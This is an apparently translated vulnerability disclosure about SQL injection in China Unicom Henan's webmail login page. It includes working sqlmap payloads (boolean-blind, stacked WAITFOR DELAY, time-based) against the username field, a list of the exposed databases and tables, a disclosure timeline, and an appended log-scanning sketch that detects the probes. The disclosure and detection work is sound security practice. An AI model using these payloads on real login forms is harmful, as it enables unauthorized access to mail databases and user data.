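2014-09-05: Details reported to the vendor; awaiting vendor handling
2014-09-10: Vendor has confirmed; details disclosed only to the vendor
2014-09-20: Details disclosed to core white hats and experts in related fields
2014-09-30: Details disclosed to regular white hats
2014-10-10: Details disclosed to intern white hats
2014-10-20: Details disclosed to the public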
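The front page is all China Telecom and China Unicom, so here is a China Unicom one from me too.
China Unicom Henan Branch mail system: http://ha.mail.chinaunicom.cn/login.aspx
Enter admin' as the account name.
It actually returns an error.
Capture the request.
URL: http://ha.mail.chinaunicom.cn/login.aspx
POST data: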
__LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=%2FwEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays%2BWNl%2BecgeWIhuWFrOWPuOeJiOadg%2BaJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb%2F6Q%3D%3D&__EVENTVALIDATION=%2FwEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD%2FHnmf%2FCEgrMwGNilWVVvtj5E5&txtUserName=a&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7
I usually change the POST into a GET and build the URL by hand. Well, it really is this long.
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Place: GET
Parameter: txtUserName
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUserName=a' AND 8125=8125 AND 'rOiO'='rOiO&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUserName=a'; WAITFOR DELAY '0:0:5'--&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: __LASTFOCUS=&__EVENTTARGET=&__EVENTARGUMENT=&__VIEWSTATE=/wEPDwUKLTcxMDE3OTE2Mw9kFgICAw9kFggCAQ8WAh4Fc3R5bGUFDmRpc3BsYXk6YmxvY2s7ZAIDDxYCHwAFDmRpc3BsYXk6YmxvY2s7FgICBA9kFgICAQ9kFgJmDw8WAh4MRXJyb3JNZXNzYWdlBS3nmbvlvZXlpLHotKXvvIzor7fmo4Dmn6XnlKjmiLflkI3lkozlr4bnoIHvvIFkZAIFDxYCHwAFLGhlaWdodDozMDBweDt0ZXh0LWFsaWduOmNlbnRlcjtkaXNwbGF5Om5vbmU7ZAIHDxYCHglpbm5lcmh0bWwFKuS4reWbveiBlOmAmuays+WNl+ecgeWIhuWFrOWPuOeJiOadg+aJgOaciWQYAQUeX19Db250cm9sc1JlcXVpcmVQb3N0QmFja0tleV9fFgIFCWJ0blN1Ym1pdAUIYnRuQ2xlYXJxVtb5o3xQ7dC7ZEbP8ekoihb/6Q==&__EVENTVALIDATION=/wEWBQK86KTMDwKl1bKzCQK1qbSRCwLCi9reAwKtkuWiCgD/Hnmf/CEgrMwGNilWVVvtj5E5&txtUserName=a' WAITFOR DELAY '0:0:5'--&txtPassword=a&btnSubmit.x=36&btnSubmit.y=7
---
web server operating system: Windows 2003
web application technology: ASP.NET, Microsoft IIS 6.0, ASP.NET 2.0.50727
back-end DBMS: Microsoft SQL Server 2008
Databases
available databases [5]:
[*] EXCHANGE
[*] master
[*] model
[*] msdb
[*] tempdb

Database: EXCHANGE
[20 tables]
+---------------------------+
| AdminUsers                |
| AutoForward               |
| Contacts                  |
| Contacts_20130514_all_bak |
| Contacts_20130801_back    |
| CustomGroup               |
| DomainContacts            |
| LockUsers                 |
| LoginErrorCount           |
| MailBox                   |
| Orgs                      |
| ReportConfig              |
| ReportPeriod              |
| RootGroup                 |
| SMSConfig                 |
| Signature                 |
| Subscription              |
| TimerMailAttachments      |
| TimerMails                |
| UserStatistic             |
+---------------------------+
There is also http://ha.mail.cnc.cn/login.aspx, which is the same as this one.
Entering a universal password returns the message: account locked.
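Severity: High
Vulnerability Rank: 11
Confirmation time: 2014-09-10 09:00
CNVD confirmed and reproduced the vulnerability as described, and it has been passed on by CNCERT to the Henan sub-center, which will follow up and coordinate handling with the organization that manages the website.
None yet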
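A detection sketch for the requests described in this report, added here as an example and not part of the original report: once the login form fields are moved from the POST body into the URL, the probes appear in the IIS `cs-uri-query` log field, where they can be matched. The log lines, field layout, rule names and the 500 status on the quoted username are constructed assumptions.

```python
import re
from urllib.parse import parse_qs

# Constructed IIS W3C log lines (documentation IPs); not from the affected server.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status time-taken
2014-09-05 08:00:01 POST /login.aspx - 192.0.2.10 200 120
2014-09-05 08:01:13 GET /login.aspx txtUserName=a%27+AND+8125%3D8125+AND+%27rOiO%27%3D%27rOiO&txtPassword=a 198.51.100.7 200 140
2014-09-05 08:01:20 GET /login.aspx txtUserName=a%27%3B+WAITFOR+DELAY+%270%3A0%3A5%27--&txtPassword=a 198.51.100.7 200 5130
2014-09-05 08:02:02 GET /login.aspx txtUserName=admin%27&txtPassword=a 198.51.100.7 500 95
"""

# Patterns follow the payload shapes shown in the sqlmap output above.
RULES = [
    ("time-delay", re.compile(r"WAITFOR\s+DELAY", re.I)),
    ("boolean-test", re.compile(r"'\s*(?:AND|OR)\s+\d+\s*=\s*\d+", re.I)),
]

def scan(log_text, field="txtUserName"):
    """Return (client_ip, time, reasons) for each request carrying `field` in the URL."""
    fields, hits = [], []
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]           # column names for the rows that follow
            continue
        if not line or line.startswith("#"):
            continue
        row = dict(zip(fields, line.split()))
        values = parse_qs(row.get("cs-uri-query", ""), keep_blank_values=True).get(field)
        if not values:
            continue                            # normal logins POST the field, so the URL has none
        value = values[0]                       # parse_qs has already percent-decoded it
        reasons = ["login-field-in-query"]      # a form field in the URL is itself anomalous
        reasons += [name for name, rx in RULES if rx.search(value)]
        if "'" in value and row.get("sc-status") == "500":
            reasons.append("quote-then-error")  # assumed: the error page is served with a 500
        hits.append((row["c-ip"], row["time"], reasons))
    return hits

if __name__ == "__main__":
    for ip, when, reasons in scan(SAMPLE_LOG):
        print(ip, when, ",".join(reasons))
```

Probes sent in the POST body do not reach `cs-uri-query`, so this check only covers the GET-rewritten form of the request.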